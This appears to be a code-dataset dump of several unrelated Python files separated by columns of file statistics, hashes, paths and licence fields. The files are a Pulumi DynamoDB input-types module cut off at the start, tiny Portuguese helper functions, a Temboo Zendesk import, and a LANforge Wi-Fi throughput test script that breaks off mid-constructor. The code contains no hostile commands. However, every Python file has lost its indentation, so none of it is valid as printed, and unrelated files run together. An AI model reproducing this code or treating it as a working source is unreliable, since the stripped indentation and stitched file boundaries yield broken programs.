pulumi.set(self, "type", value)
@pulumi.input_type
class TableGlobalSecondaryIndexArgs:
def __init__(__self__, *,
hash_key: pulumi.Input[str],
name: pulumi.Input[str],
projection_type: pulumi.Input[str],
non_key_attributes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
range_key: Optional[pulumi.Input[str]] = None,
read_capacity: Optional[pulumi.Input[int]] = None,
write_capacity: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] hash_key: The name of the hash key in the index; must be
defined as an attribute in the resource.
:param pulumi.Input[str] name: The name of the index
:param pulumi.Input[str] projection_type: One of `ALL`, `INCLUDE` or `KEYS_ONLY`
where `ALL` projects every attribute into the index, `KEYS_ONLY`
projects just the hash and range key into the index, and `INCLUDE`
projects only the keys specified in the _non_key_attributes_
parameter.
:param pulumi.Input[Sequence[pulumi.Input[str]]] non_key_attributes: Only required with `INCLUDE` as a
projection type; a list of attributes to project into the index. These
do not need to be defined as attributes on the table.
:param pulumi.Input[str] range_key: The name of the range key; must be defined
:param pulumi.Input[int] read_capacity: The number of read units for this index. Must be set if billing_mode is set to PROVISIONED.
:param pulumi.Input[int] write_capacity: The number of write units for this index. Must be set if billing_mode is set to PROVISIONED.
"""
pulumi.set(__self__, "hash_key", hash_key)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "projection_type", projection_type)
if non_key_attributes is not None:
pulumi.set(__self__, "non_key_attributes", non_key_attributes)
if range_key is not None:
pulumi.set(__self__, "range_key", range_key)
if read_capacity is not None:
pulumi.set(__self__, "read_capacity", read_capacity)
if write_capacity is not None:
pulumi.set(__self__, "write_capacity", write_capacity)
@property
@pulumi.getter(name="hashKey")
def hash_key(self) -> pulumi.Input[str]:
"""
The name of the hash key in the index; must be
defined as an attribute in the resource.
"""
return pulumi.get(self, "hash_key")
@hash_key.setter
def hash_key(self, value: pulumi.Input[str]):
pulumi.set(self, "hash_key", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the index
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="projectionType")
def projection_type(self) -> pulumi.Input[str]:
"""
One of `ALL`, `INCLUDE` or `KEYS_ONLY`
where `ALL` projects every attribute into the index, `KEYS_ONLY`
projects just the hash and range key into the index, and `INCLUDE`
projects only the keys specified in the _non_key_attributes_
parameter.
"""
return pulumi.get(self, "projection_type")
@projection_type.setter
def projection_type(self, value: pulumi.Input[str]):
pulumi.set(self, "projection_type", value)
@property
@pulumi.getter(name="nonKeyAttributes")
def non_key_attributes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Only required with `INCLUDE` as a
projection type; a list of attributes to project into the index. These
do not need to be defined as attributes on the table.
"""
return pulumi.get(self, "non_key_attributes")
@non_key_attributes.setter
def non_key_attributes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "non_key_attributes", value)
@property
@pulumi.getter(name="rangeKey")
def range_key(self) -> Optional[pulumi.Input[str]]:
"""
The name of the range key; must be defined
"""
return pulumi.get(self, "range_key")
@range_key.setter
def range_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "range_key", value)
@property
@pulumi.getter(name="readCapacity")
def read_capacity(self) -> Optional[pulumi.Input[int]]:
"""
The number of read units for this index. Must be set if billing_mode is set to PROVISIONED.
"""
return pulumi.get(self, "read_capacity")
@read_capacity.setter
def read_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "read_capacity", value)
@property
@pulumi.getter(name="writeCapacity")
def write_capacity(self) -> Optional[pulumi.Input[int]]:
"""
The number of write units for this index. Must be set if billing_mode is set to PROVISIONED.
"""
return pulumi.get(self, "write_capacity")
@write_capacity.setter
def write_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "write_capacity", value)
@pulumi.input_type
class TableLocalSecondaryIndexArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
projection_type: pulumi.Input[str],
range_key: pulumi.Input[str],
non_key_attributes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] name: The name of the index
:param pulumi.Input[str] projection_type: One of `ALL`, `INCLUDE` or `KEYS_ONLY`
where `ALL` projects every attribute into the index, `KEYS_ONLY`
projects just the hash and range key into the index, and `INCLUDE`
projects only the keys specified in the _non_key_attributes_
parameter.
:param pulumi.Input[str] range_key: The name of the range key; must be defined
:param pulumi.Input[Sequence[pulumi.Input[str]]] non_key_attributes: Only required with `INCLUDE` as a
projection type; a list of attributes to project into the index. These
do not need to be defined as attributes on the table.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "projection_type", projection_type)
pulumi.set(__self__, "range_key", range_key)
if non_key_attributes is not None:
pulumi.set(__self__, "non_key_attributes", non_key_attributes)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the index
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="projectionType")
def projection_type(self) -> pulumi.Input[str]:
"""
One of `ALL`, `INCLUDE` or `KEYS_ONLY`
where `ALL` projects every attribute into the index, `KEYS_ONLY`
projects just the hash and range key into the index, and `INCLUDE`
projects only the keys specified in the _non_key_attributes_
parameter.
"""
return pulumi.get(self, "projection_type")
@projection_type.setter
def projection_type(self, value: pulumi.Input[str]):
pulumi.set(self, "projection_type", value)
@property
@pulumi.getter(name="rangeKey")
def range_key(self) -> pulumi.Input[str]:
"""
The name of the range key; must be defined
"""
return pulumi.get(self, "range_key")
@range_key.setter
def range_key(self, value: pulumi.Input[str]):
pulumi.set(self, "range_key", value)
@property
@pulumi.getter(name="nonKeyAttributes")
def non_key_attributes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Only required with `INCLUDE` as a
projection type; a list of attributes to project into the index. These
do not need to be defined as attributes on the table.
"""
return pulumi.get(self, "non_key_attributes")
@non_key_attributes.setter
def non_key_attributes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "non_key_attributes", value)
@pulumi.input_type
class TablePointInTimeRecoveryArgs:
def __init__(__self__, *,
enabled: pulumi.Input[bool]):
"""
:param pulumi.Input[bool] enabled: Indicates whether ttl is enabled (true) or disabled (false).
"""
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def enabled(self) -> pulumi.Input[bool]:
"""
Indicates whether ttl is enabled (true) or disabled (false).
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: pulumi.Input[bool]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class TableReplicaArgs:
def __init__(__self__, *,
region_name: pulumi.Input[str]):
"""
:param pulumi.Input[str] region_name: Region name of the replica.
"""
pulumi.set(__self__, "region_name", region_name)
@property
@pulumi.getter(name="regionName")
def region_name(self) -> pulumi.Input[str]:
"""
Region name of the replica.
"""
return pulumi.get(self, "region_name")
@region_name.setter
def region_name(self, value: pulumi.Input[str]):
pulumi.set(self, "region_name", value)
@pulumi.input_type
class TableServerSideEncryptionArgs:
def __init__(__self__, *,
enabled: pulumi.Input[bool],
kms_key_arn: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[bool] enabled: Indicates whether ttl is enabled (true) or disabled (false).
:param pulumi.Input[str] kms_key_arn: The ARN of the CMK that should be used for the AWS KMS encryption.
This attribute should only be specified if the key is different from the default DynamoDB CMK, `alias/aws/dynamodb`.
"""
pulumi.set(__self__, "enabled", enabled)
if kms_key_arn is not None:
pulumi.set(__self__, "kms_key_arn", kms_key_arn)
@property
@pulumi.getter
def enabled(self) -> pulumi.Input[bool]:
"""
Indicates whether ttl is enabled (true) or disabled (false).
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: pulumi.Input[bool]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="kmsKeyArn")
def kms_key_arn(self) -> Optional[pulumi.Input[str]]:
"""
The ARN of the CMK that should be used for the AWS KMS encryption.
This attribute should only be specified if the key is different from the default DynamoDB CMK, `alias/aws/dynamodb`.
"""
return pulumi.get(self, "kms_key_arn")
@kms_key_arn.setter
def kms_key_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_arn", value)
@pulumi.input_type
class TableTtlArgs:
def __init__(__self__, *,
attribute_name: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] attribute_name: The name of the table attribute to store the TTL timestamp in.
:param pulumi.Input[bool] enabled: Indicates whether ttl is enabled (true) or disabled (false).
"""
pulumi.set(__self__, "attribute_name", attribute_name)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter(name="attributeName")
def attribute_name(self) -> pulumi.Input[str]:
"""
The name of the table attribute to store the TTL timestamp in.
"""
return pulumi.get(self, "attribute_name")
@attribute_name.setter
def attribute_name(self, value: pulumi.Input[str]):
pulumi.set(self, "attribute_name", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether ttl is enabled (true) or disabled (false).
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class GetTableServerSideEncryptionArgs:
def __init__(__self__, *,
enabled: bool,
kms_key_arn: str):
pulumi.set(__self__, "enabled", enabled)
pulumi.set(__self__, "kms_key_arn", kms_key_arn)
@property
@pulumi.getter
def enabled(self) -> bool:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: bool):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="kmsKeyArn")
def kms_key_arn(self) -> str:
return pulumi.get(self, "kms_key_arn")
@kms_key_arn.setter
def kms_key_arn(self, value: str):
pulumi.set(self, "kms_key_arn", value)
| 35.972789
| 141
| 0.633447
| 1,988
| 15,864
| 4.867706
| 0.082998
| 0.110261
| 0.086804
| 0.043195
| 0.870001
| 0.809548
| 0.791878
| 0.771417
| 0.750853
| 0.714581
| 0
| 0.000254
| 0.255736
| 15,864
| 440
| 142
| 36.054545
| 0.819344
| 0.300555
| 0
| 0.633065
| 1
| 0
| 0.102301
| 0.016589
| 0
| 0
| 0
| 0
| 0
| 1
| 0.21371
| false
| 0
| 0.020161
| 0.008065
| 0.358871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
531732938f823a08099857cd3f950ce94c14880b
| 163
|
py
|
Python
|
PythonExercicios/ex107/moeda.py
|
lordvinick/Python
|
c03fd08d4c204104bf0196b0bd129427fd2067ae
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex107/moeda.py
|
lordvinick/Python
|
c03fd08d4c204104bf0196b0bd129427fd2067ae
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex107/moeda.py
|
lordvinick/Python
|
c03fd08d4c204104bf0196b0bd129427fd2067ae
|
[
"MIT"
] | null | null | null |
def dobro(n):
return n * 2
def metade(n):
return n / 2
def aumentar(n):
return n + (10 / 100 * n)
def diminuir(n):
return n - (13 / 100 * n)
| 10.866667
| 29
| 0.521472
| 28
| 163
| 3.035714
| 0.392857
| 0.329412
| 0.376471
| 0.211765
| 0.282353
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110092
| 0.331288
| 163
| 14
| 30
| 11.642857
| 0.669725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
531d2f25dc1dbe6a7fabf963d1ad341f8a8e99b4
| 126
|
py
|
Python
|
temboo/core/Library/Zendesk/Tags/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Zendesk/Tags/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Zendesk/Tags/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Zendesk.Tags.ListTags import ListTags, ListTagsInputSet, ListTagsResultSet, ListTagsChoreographyExecution
| 63
| 125
| 0.888889
| 11
| 126
| 10.181818
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 126
| 1
| 126
| 126
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5330461e76435e6a79d0153a3c546ef32ad7b769
| 45,041
|
py
|
Python
|
py-scripts/tip-cicd-sanity/single_client_throughput.py
|
yadavnikita/lanforge-scripts
|
067e75b71cd5c756d87da2fc4856b67e24260cab
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
py-scripts/tip-cicd-sanity/single_client_throughput.py
|
yadavnikita/lanforge-scripts
|
067e75b71cd5c756d87da2fc4856b67e24260cab
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
py-scripts/tip-cicd-sanity/single_client_throughput.py
|
yadavnikita/lanforge-scripts
|
067e75b71cd5c756d87da2fc4856b67e24260cab
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# Script is based off of sta_connect2.py
# Script built for max throughput testing on a single client
# The main function of the script creates a station, then tests:
# 1. UDP Downstream (AP to STA)
# 2. UDP Upstream (STA to AP)
# 3. TCP Downstream (AP to STA)
# 4. TCP Upstream (STA to AP)
# The script will clean up the station and connections at the end of the test.
import sys
import csv
if sys.version_info[0] != 3:
print("This script requires Python 3")
exit(1)
if 'py-json' not in sys.path:
sys.path.append('../../py-json')
import argparse
from LANforge import LFUtils
# from LANforge import LFCliBase
from LANforge import lfcli_base
from LANforge.lfcli_base import LFCliBase
from LANforge.LFUtils import *
import realm
from realm import Realm
import pprint
OPEN="open"
WEP="wep"
WPA="wpa"
WPA2="wpa2"
MODE_AUTO=0
class SingleClient(LFCliBase):
def __init__(self, host, port, _dut_ssid="jedway-open-1", _dut_passwd="NA", _dut_bssid="",
_user="", _passwd="", _sta_mode="0", _radio="wiphy0",
_resource=1, _upstream_resource=1, _upstream_port="eth1",
_sta_name=None, debug_=False, _dut_security=OPEN, _exit_on_error=False,
_cleanup_on_exit=True, _runtime_sec=60, _exit_on_fail=False):
# do not use `super(LFCLiBase,self).__init__(self, host, port, _debugOn)
# that is py2 era syntax and will force self into the host variable, making you
# very confused.
super().__init__(host, port, _debug=debug_, _halt_on_error=_exit_on_error, _exit_on_fail=_exit_on_fail)
self.debug = debug_
self.dut_security = _dut_security
self.dut_ssid = _dut_ssid
self.dut_passwd = _dut_passwd
self.dut_bssid = _dut_bssid
self.user = _user
self.passwd = _passwd
self.sta_mode = _sta_mode # See add_sta LANforge CLI users guide entry
self.radio = _radio
self.resource = _resource
self.upstream_resource = _upstream_resource
self.upstream_port = _upstream_port
self.runtime_secs = _runtime_sec
self.cleanup_on_exit = _cleanup_on_exit
self.sta_url_map = None # defer construction
self.upstream_url = None # defer construction
self.station_names = []
if _sta_name is not None:
self.station_names = [ _sta_name ]
# self.localrealm :Realm = Realm(lfclient_host=host, lfclient_port=port) # py > 3.6
self.localrealm = Realm(lfclient_host=host, lfclient_port=port) # py > 3.6
self.resulting_stations = {}
self.resulting_endpoints = {}
self.station_profile = None
self.l3_udp_profile = None
self.l3_tcp_profile = None
# def get_realm(self) -> Realm: # py > 3.6
def get_realm(self):
return self.localrealm
def get_station_url(self, sta_name_=None):
if sta_name_ is None:
raise ValueError("get_station_url wants a station name")
if self.sta_url_map is None:
self.sta_url_map = {}
for sta_name in self.station_names:
self.sta_url_map[sta_name] = "port/1/%s/%s" % (self.resource, sta_name)
return self.sta_url_map[sta_name_]
def get_upstream_url(self):
if self.upstream_url is None:
self.upstream_url = "port/1/%s/%s" % (self.upstream_resource, self.upstream_port)
return self.upstream_url
# Compare pre-test values to post-test values
def compare_vals(self, name, postVal, print_pass=False, print_fail=True):
# print(f"Comparing {name}")
if postVal > 0:
self._pass("%s %s" % (name, postVal), print_pass)
else:
self._fail("%s did not report traffic: %s" % (name, postVal), print_fail)
def remove_stations(self):
for name in self.station_names:
LFUtils.removePort(self.resource, name, self.lfclient_url)
def num_associated(self, bssid):
counter = 0
# print("there are %d results" % len(self.station_results))
fields = "_links,port,alias,ip,ap,port+type"
self.station_results = self.localrealm.find_ports_like("sta*", fields, debug_=False)
if (self.station_results is None) or (len(self.station_results) < 1):
self.get_failed_result_list()
for eid,record in self.station_results.items():
#print("-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ")
#pprint(eid)
#pprint(record)
if record["ap"] == bssid:
counter += 1
#print("-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ")
return counter
def clear_test_results(self):
self.resulting_stations = {}
self.resulting_endpoints = {}
super().clear_test_results()
#super(StaConnect, self).clear_test_results().test_results.clear()
def setup(self):
self.clear_test_results()
self.check_connect()
upstream_json = self.json_get("%s?fields=alias,phantom,down,port,ip" % self.get_upstream_url(), debug_=False)
if upstream_json is None:
self._fail(message="Unable to query %s, bye" % self.upstream_port, print_=True)
return False
if upstream_json['interface']['ip'] == "0.0.0.0":
if self.debug:
pprint.pprint(upstream_json)
self._fail("Warning: %s lacks ip address" % self.get_upstream_url(), print_=True)
return False
# remove old stations
print("Removing old stations")
for sta_name in self.station_names:
sta_url = self.get_station_url(sta_name)
response = self.json_get(sta_url)
if (response is not None) and (response["interface"] is not None):
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
LFUtils.wait_until_ports_disappear(self.lfclient_url, self.station_names)
# Create stations and turn dhcp on
self.station_profile = self.localrealm.new_station_profile()
if self.dut_security == WPA2:
self.station_profile.use_security(security_type="wpa2", ssid=self.dut_ssid, passwd=self.dut_passwd)
elif self.dut_security == WPA:
self.station_profile.use_security(security_type="wpa", ssid=self.dut_ssid, passwd=self.dut_passwd)
elif self.dut_security == OPEN:
self.station_profile.use_security(security_type="open", ssid=self.dut_ssid, passwd="[BLANK]")
elif self.dut_security == WPA:
self.station_profile.use_security(security_type="wpa", ssid=self.dut_ssid, passwd=self.dut_passwd)
elif self.dut_security == WEP:
self.station_profile.use_security(security_type="wep", ssid=self.dut_ssid, passwd=self.dut_passwd)
self.station_profile.set_command_flag("add_sta", "create_admin_down", 1)
print("Adding new stations ", end="")
self.station_profile.create(radio=self.radio, sta_names_=self.station_names, up_=False, debug=self.debug, suppress_related_commands_=True)
LFUtils.wait_until_ports_appear(self.lfclient_url, self.station_names, debug=self.debug)
def start(self):
if self.station_profile is None:
self._fail("Incorrect setup")
pprint.pprint(self.station_profile)
if self.station_profile.up is None:
self._fail("Incorrect station profile, missing profile.up")
if self.station_profile.up == False:
print("\nBringing ports up...")
data = {"shelf": 1,
"resource": self.resource,
"port": "ALL",
"probe_flags": 1}
self.json_post("/cli-json/nc_show_ports", data)
self.station_profile.admin_up()
LFUtils.waitUntilPortsAdminUp(self.resource, self.lfclient_url, self.station_names)
# station_info = self.jsonGet(self.mgr_url, "%s?fields=port,ip,ap" % (self.getStaUrl()))
duration = 0
maxTime = 100
ip = "0.0.0.0"
ap = ""
print("Waiting for %s stations to associate to AP: " % len(self.station_names), end="")
connected_stations = {}
while (len(connected_stations.keys()) < len(self.station_names)) and (duration < maxTime):
duration += 3
time.sleep(10)
print(".", end="")
for sta_name in self.station_names:
sta_url = self.get_station_url(sta_name)
station_info = self.json_get(sta_url + "?fields=port,ip,ap")
# LFUtils.debug_printer.pprint(station_info)
if (station_info is not None) and ("interface" in station_info):
if "ip" in station_info["interface"]:
ip = station_info["interface"]["ip"]
if "ap" in station_info["interface"]:
ap = station_info["interface"]["ap"]
if (ap == "Not-Associated") or (ap == ""):
if self.debug:
print(" -%s," % sta_name, end="")
else:
if ip == "0.0.0.0":
if self.debug:
print(" %s (0.0.0.0)" % sta_name, end="")
else:
connected_stations[sta_name] = sta_url
data = {
"shelf":1,
"resource": self.resource,
"port": "ALL",
"probe_flags": 1
}
self.json_post("/cli-json/nc_show_ports", data)
for sta_name in self.station_names:
sta_url = self.get_station_url(sta_name)
station_info = self.json_get(sta_url) # + "?fields=port,ip,ap")
if station_info is None:
print("unable to query %s" % sta_url)
self.resulting_stations[sta_url] = station_info
ap = station_info["interface"]["ap"]
ip = station_info["interface"]["ip"]
if (ap != "") and (ap != "Not-Associated"):
print(" %s +AP %s, " % (sta_name, ap), end="")
if self.dut_bssid != "":
if self.dut_bssid.lower() == ap.lower():
self._pass(sta_name+" connected to BSSID: " + ap)
# self.test_results.append("PASSED: )
# print("PASSED: Connected to BSSID: "+ap)
else:
self._fail("%s connected to wrong BSSID, requested: %s Actual: %s" % (sta_name, self.dut_bssid, ap))
else:
self._fail(sta_name+" did not connect to AP")
return False
if ip == "0.0.0.0":
self._fail("%s did not get an ip. Ending test" % sta_name)
else:
self._pass("%s connected to AP: %s With IP: %s" % (sta_name, ap, ip))
if self.passes() == False:
if self.cleanup_on_exit:
print("Cleaning up...")
self.remove_stations()
return False
def udp_profile(self, side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu):
# Create UDP endpoint - Alex's code!
self.l3_udp_tput_profile = self.localrealm.new_l3_cx_profile()
self.l3_udp_tput_profile.side_a_min_bps = side_a_min_bps
self.l3_udp_tput_profile.side_b_min_bps = side_b_min_bps
self.l3_udp_tput_profile.side_a_min_pdu = side_a_min_pdu
self.l3_udp_tput_profile.side_b_min_pdu = side_b_min_pdu
self.l3_udp_tput_profile.report_timer = 1000
self.l3_udp_tput_profile.name_prefix = "udp"
self.l3_udp_tput_profile.create(endp_type="lf_udp",
side_a=list(self.localrealm.find_ports_like("tput+")),
side_b="%d.%s" % (self.resource, self.upstream_port),
suppress_related_commands=True)
def tcp_profile(self, side_a_min_bps, side_b_min_bps):
# Create TCP endpoints - original code!
self.l3_tcp_tput_profile = self.localrealm.new_l3_cx_profile()
self.l3_tcp_tput_profile.side_a_min_bps = side_a_min_bps
self.l3_tcp_tput_profile.side_b_min_bps = side_b_min_bps
self.l3_tcp_tput_profile.name_prefix = "tcp"
self.l3_tcp_tput_profile.report_timer = 1000
self.l3_tcp_tput_profile.create(endp_type="lf_tcp",
side_a=list(self.localrealm.find_ports_like("tput+")),
side_b="%d.%s" % (self.resource, self.upstream_port),
suppress_related_commands=True)
# Start UDP Downstream Traffic
def udp_throughput(self):
print("\nStarting UDP Traffic")
self.l3_udp_tput_profile.start_cx()
time.sleep(1)
self.l3_udp_tput_profile.refresh_cx()
def tcp_throughput(self):
print("\nStarting TCP Traffic")
self.l3_tcp_tput_profile.start_cx()
time.sleep(1)
self.l3_tcp_tput_profile.refresh_cx()
def udp_stop(self):
# stop cx traffic
print("Stopping CX Traffic")
self.l3_udp_tput_profile.stop_cx()
# Refresh stats
print("\nRefresh CX stats")
self.l3_udp_tput_profile.refresh_cx()
print("Sleeping for 5 seconds")
time.sleep(5)
# get data for endpoints JSON
return self.collect_client_stats(self.l3_udp_tput_profile.created_cx)
# print("\n")
def tcp_stop(self):
# stop cx traffic
print("Stopping CX Traffic")
self.l3_tcp_tput_profile.stop_cx()
# Refresh stats
print("\nRefresh CX stats")
self.l3_tcp_tput_profile.refresh_cx()
print("Sleeping for 5 seconds")
time.sleep(5)
# get data for endpoints JSON
return self.collect_client_stats(self.l3_tcp_tput_profile.created_cx)
# print("\n")
# New Endpoint code to print TX and RX numbers
def collect_client_stats(self, endp_map):
print("Collecting Data")
fields="?fields=name,tx+bytes,rx+bytes"
for (cx_name, endps) in endp_map.items():
try:
endp_url = "/endp/%s%s" % (endps[0], fields)
endp_json = self.json_get(endp_url)
self.resulting_endpoints[endp_url] = endp_json
ptest_a_tx = endp_json['endpoint']['tx bytes']
ptest_a_rx = endp_json['endpoint']['rx bytes']
# ptest = self.json_get("/endp/%s?fields=tx+bytes,rx+bytes" % cx_names[cx_name]["b"])
endp_url = "/endp/%s%s" % (endps[1], fields)
endp_json = self.json_get(endp_url)
self.resulting_endpoints[endp_url] = endp_json
ptest_b_tx = endp_json['endpoint']['tx bytes']
ptest_b_rx = endp_json['endpoint']['rx bytes']
byte_values = []
byte_values.append("Station TX: " + str(ptest_a_tx))
byte_values.append("Station RX: " + str(ptest_a_rx))
byte_values.append("AP TX: " + str(ptest_b_tx))
byte_values.append("AP RX: " + str(ptest_b_rx))
return byte_values
except Exception as e:
self.error(e)
def cleanup_udp(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_udp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_udp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug= self.debug)
def cleanup_tcp(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_tcp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_tcp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug= self.debug)
def cleanup(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_tcp_tput_profile.get_cx_names())
removeCX(self.lfclient_url, self.l3_udp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_tcp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
for (cx_name, endp_names) in self.l3_udp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug=self.debug)
def udp_unidirectional(self, side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu, direction, values_line):
self.udp_profile(side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu)
self.start()
print("Running", direction, "Traffic for %s seconds" % self.runtime_secs)
self.udp_throughput()
print("napping %f sec" % self.runtime_secs)
time.sleep(self.runtime_secs)
values = self.udp_stop()
print(values)
# Get value required for measurement
bytes = values[values_line]
# Get value in Bits and convert to Mbps
bits = (int(bytes.split(": ", 1)[1])) * 8
mpbs = round((bits / 1000000) / self.runtime_secs, 2)
return mpbs
def tcp_unidirectional(self, side_a_min_bps, side_b_min_bps, direction, values_line):
self.tcp_profile(side_a_min_bps, side_b_min_bps)
self.start()
print("Running", direction, "Traffic for %s seconds" % self.runtime_secs)
self.tcp_throughput()
print("napping %f sec" % self.runtime_secs)
time.sleep(self.runtime_secs)
values = self.tcp_stop()
print(values)
# Get value required for measurement
bytes = values[values_line]
# Get value in Bits and convert to Mbps
bits = (int(bytes.split(": ", 1)[1])) * 8
mpbs = round((bits / 1000000) / self.runtime_secs, 2)
return mpbs
def throughput_csv(csv_file, ssid_name, ap_model, firmware, security, udp_ds, udp_us, tcp_ds, tcp_us):
# Find band for CSV ---> This code is not great, it SHOULD get that info from LANForge!
if "5G" in ssid_name:
frequency = "5 GHz"
elif "2dot4G" in ssid_name:
frequency = "2.4 GHz"
else:
frequency = "Unknown"
# Append row to top of CSV file
row = [ap_model, firmware, frequency, security, udp_ds, udp_us, tcp_ds, tcp_us]
with open(csv_file, 'r') as readFile:
reader = csv.reader(readFile)
lines = list(reader)
lines.insert(1, row)
with open(csv_file, 'w') as writeFile:
writer = csv.writer(writeFile)
writer.writerows(lines)
readFile.close()
writeFile.close()
class SingleClientEAP(LFCliBase):
def __init__(self, host, port, security=None, ssid=None, sta_list=None, number_template="00000", _debug_on=False, _dut_bssid="",
_exit_on_error=False, _sta_name=None, _resource=1, radio="wiphy0", key_mgmt="WPA-EAP", eap="", identity="",
ttls_passwd="", hessid=None, ttls_realm="", domain="", _exit_on_fail=False, _cleanup_on_exit=True):
super().__init__(host, port, _debug=_debug_on, _halt_on_error=_exit_on_error, _exit_on_fail=_exit_on_fail)
self.host = host
self.port = port
self.ssid = ssid
self.radio = radio
self.security = security
#self.password = password
self.sta_list = sta_list
